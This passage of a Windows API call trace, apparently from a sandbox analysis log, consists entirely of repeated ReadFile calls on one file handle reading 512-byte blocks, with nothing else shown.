lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.094] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.094] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.094] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.094] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.097] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.098] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: 